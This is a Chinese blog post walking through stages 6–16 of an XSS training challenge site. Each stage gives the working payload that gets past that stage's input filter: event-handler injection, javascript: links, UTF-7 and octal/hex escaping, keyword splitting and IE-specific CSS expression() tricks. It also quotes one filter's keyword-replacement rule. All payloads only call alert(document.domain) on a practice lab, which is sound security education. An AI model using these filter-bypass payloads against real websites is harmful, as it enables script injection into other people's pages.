XSS challenge(6-15)

最新推荐文章于 2024-09-27 17:41:32 发布
最新推荐文章于 2024-09-27 17:41:32 发布
阅读量154 收藏 1
点赞数
分类专栏: 靶场 注入 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45210835/article/details/113494690
版权

XSS challenge(6-15)

目录
Stage #6 1
Stage #7 2
Stage #8 3
Stage #9 5
Stage #10 7
Stage #11 8
Stage #12 9
Stage #13 11
Stage #14 12
Stage #15 13
Stage #16 15

Stage #6

  1. 探寻
    在这里插入图片描述

  2. 构造payload
    ">
    在这里插入图片描述

发现对大于小于进行了过滤
3. 重构payload
" οnmοuseοver=alert(document.domain)
在这里插入图片描述

  1. Payload
    利用事件来对JS重写

Stage #7

  1. 探寻
    在这里插入图片描述

  2. 构造payload
    " οnmοuseοver=alert(document.domain)
    在这里插入图片描述

  3. Payload
    对事件可以直接使用,偷懒的直接使用上面的事件
    Stage #8

  4. 探寻
    在这里插入图片描述

  5. 构造payload
    ">
    在这里插入图片描述

存在过滤,有超链接,我们伪造协议

  1. 重构payload
    javascript:alert(document.domain)
    在这里插入图片描述

  2. Payload
    通过超链接的方式跳开

Stage #9

  1. 探寻
    在这里插入图片描述

发现了还存在另一个变量,采用抓包
2. 构造payload
在这里插入图片描述在这里插入图片描述
在这里插入图片描述

构造失败,珠宝后面后又发现另一个变量是编码UTF-7(只有IE7才可以)
3. 重构payload
在这里插入图片描述

p1=1%2bACI-οnmοuseοver=%2bACI-alert(document.domain)%2bADsAIg-x=%2bACI-&charset=UTF-7
这里对p1变量提前转码的操作,然后让服务器可以直接识别
在这里插入图片描述

  1. Payload
    这里用到的IE7下的UTF-7编码,对IE的特殊还是又考虑的,但是现在已经不是用UTF-7编码了

Stage #10

  1. 探寻
    在这里插入图片描述

  2. 构造payload
    " οnmοuseοver=alert(document.domain)
    在这里插入图片描述

对domain进行了过滤,那我们尝试一下怎么去处理这个过滤
3. 重构payload
" οnmοuseοver=alert(document.domdomainain)
在这里插入图片描述

  1. Payload
    这里对值进行了匹配过滤,但是过滤的方式比较简单,我们可以通过拼接的方式来重组一个完整的domain
    Stage #11
    思路:https://blog.csdn.net/taozijun/article/details/81277187

在这里插入图片描述在这里插入图片描述
在这里插入图片描述

利用HTML转义字符,即HTML实体,对过滤的字符单独处理,跳过过滤让HTML可以成功的渲染出来

Stage #12

  1. 探寻
    在这里插入图片描述

  2. 构造payload
    " οnmοuseοver=alert(document.domain)
    在这里插入图片描述

">
在这里插入图片描述

发现过滤了大于小于符号,还有引号
3. 重构payload
`` οnmοuseοver=alert(document.domain)
在这里插入图片描述
在这里插入图片描述

在IE中,两个反引号会被IE识别为双引号,从而闭合value
4. Payload
考虑的是对IE的反引号识别

Stage #13

  1. 探寻
    在这里插入图片描述

这里主要CSS的加入
2. 构造payload
" οnmοuseοver=alert(document.domain)
在这里插入图片描述

参数返回 分析出对引号处理了,无法闭合标签
3. 重新构造payload
background:red;background:url(“javascript:alert(document.domian)”);
在这里插入图片描述

利用的css的动态样式和IE浏览器的特性
4. Payload
对普通参数提交,查看返回值
发送简单的JS代码,查询变量的变化 =》 存在过滤情况
如果是加入CSS,那么考虑CSS的特点和伪协议的利用点(URL)
background:red;background:url(“javascript:alert(document.domian)”);

Stage #14

  1. 探寻
    在这里插入图片描述

  2. 构造payload
    简单构造一个JS查看返回参数
    " οnmοuseοver=alert(document.domain)
    在这里插入图片描述

发现双引号被转义成了浏览器HTML转义字符

在这里插入图片描述

尝试了事件,发现过滤规则
s/(url|script|eval|expression)/xxx/ig;
3. 重构payload
xss:expr/**/ession(alert(document.domain));
在这里插入图片描述

  1. Payload
    因为是页面涉及的是CSS的,所以继续利用IE的特性,还有注释,利用块注释来分开过滤规则,完成代码执行
    xss:expr/**/ession(alert(document.domain));

Stage #15

  1. 探寻

在这里插入图片描述

对JS有直接的过滤
2. 构造payload
" >1
在这里插入图片描述在这里插入图片描述

发现源码中隐藏了一个编码,是浏览器的HTML转义字符
3. 重构payload
第一次提交
\x3csvg\x2fοnlοad=alert(document.domain)\x3e
在这里插入图片描述

会将 \ 过滤
第二次提交
\x3csvg\x2fοnlοad=alert(document.domain)\x3e
在这里插入图片描述

  1. Payload
    整体是浏览器的一个HTML转义字符
    /x3e > /x3c < /2f /

Stage #16
摘要思路:https://blog.csdn.net/taozijun/article/details/81277187

  1. 还是document:weite =》先直接采用15题的代码,发现了过滤了 \x
    我们的编码可以换成8进制的编码字符:
    \74img src=x οnerrοr=alert(document.domain)\76
    直接把15题的编码转义为8进制的编码,直接通过,这里还是利用的是编码的机制过滤
syf_372
关注
专栏目录
XSS Challenges闯1-6
linxaiomo
04-07 1057
第一: 靶场链接XSS Challenges (by yamagata21) - Stage #1 第一截图:(翻译为中文后) 选中Hint查看提示:显示非常容易,但是图中显示必须要用alert(document.doman)完成,我们优先考虑xss的常规操作,直接用script标签完成alert弹出。 Hint: very simple... 看到图中的搜索框,输入弹窗xss <script>alert(document.domain)</script&g..
CodeMonkey过学习笔记系列:特技卡 6-1 ~ 6-15
马哥私房菜
06-20 1168
CodeMonkey过学习笔记系列:76-85 第 76 挑战 goto = (a) -&amp;amp;amp;amp;gt; turnTo a step distanceTo a for match in matches goto match grab() goto pile drop() //===============================...
XSS Challenges/刷题/Stage #6
null1024的博客
09-17 126
进入题目页面,如下图,随便输入 F12查看源码,发现如下图,我原本的思路是想着拼接然后闭合双引号,结果提交后,发现不对
XSS challenge笔记
qq_43571759的博客
02-22 1126
XSS challenge笔记 ps:小白一名,有问题请指教 XSS训练平台点这里 challenge1: 将敏感字符试一下检查是否存在过滤,发现没有进行过滤直接输入: <script>alert(document.domain)</script> 成功: challenge2 直接使用challenge1中的代码试一下,发现没有弹框和提示,仅仅只有try agi...
XSS学习笔记:XSS Challenges 1-19通全详解
闵行小鱼塘
10-07 6137
通过 XSS Challenges 平台学习下XSS,共19
xss-challenge-tour(XSS靶场)1-10
00勇士王子的博客
09-06 927
第一 第一是最简单的,什么限制都没有,直接上最普通的xss代码实现弹窗 <script>alert(‘xss’)</script> payload <script>alert('xss')</script> 第二 直接输入第一的代码,没有弹窗,F12看一下代码,尝试进行闭合 下面是包含我们之前输入的内容的代码 <input name="keyword" value="<script>alert(/xss/)</scr.
一道xss题目--intigriti-0422-XSS-Challenge-Write-up
banliyaoguai的博客
08-25 667
当然后也有别的merge,如下图,这里有qs.settings这个属性然后就可以尝试控制decSettings,但是我们的注入点在那个上面呢,不急接着往下看。我们尝试构造一个原型对象原型对象有一个属性名为1的属性,然后temp[1]又是空,我们访问1的时候就可以取出1里面的内容。绕过的方法就看root了,root下面有很多方法,我们想办法找到decSetting.root上面的元素,如下面。在这里你输入什么接的就是什么,比如输入的是config然后接的就是qs.config,所以我们用户可控的点在这里。
xss challenge 下载 xss 实践通小游戏,以闯的形式检验xss掌握程度。
04-27
xss challenge 下载 xss 实践通小游戏,以闯的形式检验xss掌握程度。
xss challenge accepted靶场 11-20 详细教程
小明师傅博客
06-10 937
第11 唯一有变化的就是这个地方 referer会传入参数 我们直接在会改变的元素改 成功 第12 发现了这条 User-Agent头注入 第13 cookie注入 15 发现有个网站,打开发现要科学上网才可以访问 找了好久,之后才发现是被修复了漏洞的网站 在乌云倒是找到了,用上传有xss代码的图片触发 15 我这里不知道为什么打不开 16 script,/被过滤了,可以借用img标签的onerror事件,img标签支持onerror 事件,在装载文档或图像的过
xss challenge accepted靶场 1-5 详细教程
小明师傅博客
06-01 965
来到第一 发现没有输入框,尝试一下改url试一下 发现在url中可以输入 我们直接来个最普通的xss代码,看一下是否可以 <script>alert(1)</script> 发现直接可以了,下一 第二 继续来个普通的,发现不行 我们来查看一下网页源码,按f12或右键查看源码 发现我们输入的script语句在包含中 所以我们要把input闭合掉 输入 1"><script>alert(1)</script> 过 第三 老规矩.
XSS-labs-master闯11-20 writeup
weixin_41487522的博客
06-15 816
XSS-Challenge11-20 writeup 今天接着上次的1-10,跟大家分享一下XSS-challenge的11-20。喜欢的小伙伴记得点个赞哦! xss-level11: 查看源码: 可以看出和上一一样,隐藏了表单使得前端看不到。这一的突破口在于 $_SERVER['HTTP_REFERER'] 这个代码可以获取http请求头中的referer,所谓referer就是指当前页面是从哪里来的。源码中可以看出,只过滤了尖括号,可以使用javascript伪协议来绕过。 打开burp抓包:
利用docker搭建XSS-challenge-tour
qq_50650027的博客
10-14 606
用Xshell连接虚拟机,在菜鸟教程找到docker 复制粘贴丢入下载连接 安装过程没有报错之后输入 docker version查看时候安装完成 这样就是安装完成尝试代码 docker run hello-world 出现了hello from Docker! 就完成了docker 的安装 现在开始搭建XSS-challenge-tour,在xshell中用rz上传XSS-challenge-tour.zip文件 上传之后用 ls 查看是否上传完成 看到了XSS-challenge-tour.zip 再用
XSS靶场level15详细通教程
m0_49434302的博客
07-07 1803
我的一个朋友这些天在家找工作,利用间隙时间重温一下XSS靶场。可是做到第15的时候,怎么也无法通。我这个朋友在15卡住了2天。最后终于找到了问题的根源。【这个朋友使用的是在线靶场,如果你是自己搭建的靶场不会遇到我的问题,只需阅读前半部分即可。】 第一步:查看源码 注意到了一个新朋友:ng-include。 ng-include 指令用于包含外部的HTML文件。包含的内容将作为指定元素的子节点。ng-include属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一域
【渗透测试】---xss-labs闯15-18
qq_43168364的博客
08-22 1596
第十五 这一使用了AngularJS框架,它可以通过<script>标签添加到HTML页面,它通过指令(其实就是新的属性)扩展了HTML。 服务器端代码解析 前端代码解析 ng-app 指令 ---- 初始化一个 AngularJS 应用程序。 ng-include 指令 ---- 用于包含外部的 HTML 文件。ng-include 属性的值可以是一个表达式,返回一个文件名。默认情况下,包含的文件需要包含在同一个域名下。(它的作用有点类似于PHP中的include函数) 这里可以让n
CVE-2024-1112 Resource Hacker 缓冲区溢出分析
信息安全
09-23 935
CVE-2024-1112 是 Resource Hacker 软件的一个缓冲区溢出漏洞。该漏洞存在于版本 3.6.0.92 中。由于软件在处理命令行中的文件路径时未对文件字符串长度进行限制,过长的字符串参数导致内存被过度写入,从而引发缓冲区溢出。
部标主动安全(ADAS+DMS)对接说明
谁念西风独自凉
09-27 436
上一篇介绍了,这里说一下如何对接主动安全附件服务器。流媒体的对接主要牵扯到4个方面:(1)平台端:业务端系统,包含前端呈现界面。(2)JT/T808网:部标设备接入网,这个是非常重要的,是设备与平台进行数据交换的桥梁,流媒体相的指令操作也必须依赖它完成。(3)部标视频机:符合JT/T808协议的车载视频机器。(4)流媒体服务:符合苏标、粤标、川标、陕标协议的主动安全附件服务,接收文件流,并存储。
Splashtop 加入 Microsoft 智能安全协会
最新发布
SplashtopLoki的博客
09-27 370
Splashtop 的 Foxpass Cloud RADIUS 可提供精确的访问控制,保护 Wi-Fi 网络免受未授权用户和网络攻击的侵害,Foxpass 因其流畅的用户体验和强大的安全性而广受认可。MISA 由独立软件供应商(ISV)和托管安全服务提供商(MISA)组成,他们将其解决方案与 Microsoft 安全技术集成,以更好地保护我们共同的客户免受日益增长的网络威胁。MISA 的使命是提供行业领先的智能安全解决方案,在安全威胁不断增加的情况下,以 AI 的速度和规模保护组织安全
【注册/登录安全分析报告:孔夫子旧书网】
weixin_46641057的博客
09-27 563
孔夫子网简称孔网,创建于2002年,是大型的二手旧货、古旧图书和商品交易平台,是传统文化行业结合互联网而搭建的C2C平台,是有传统文化价值的旧货市场。网站主要板块是书店区和拍卖区。网站秉承“网罗天下图书,传承中华文明”的理念,致力于发掘、抢救、保护和传播中国传统文化资源。作为旧古书二手市场平台的“独角兽”企业, 技术实力也应该不错,但采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。
xss-labs-master靶场
09-29
xss-labs-master靶场是一个用于学习和实践跨站脚本攻击(Cross-Site Scripting,简称XSS)的实验环境。可以从GitHub上下载该靶场的源码,地址是https://github.com/do0dl3/xss-labs。在这个靶场中,你可以找到各种...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值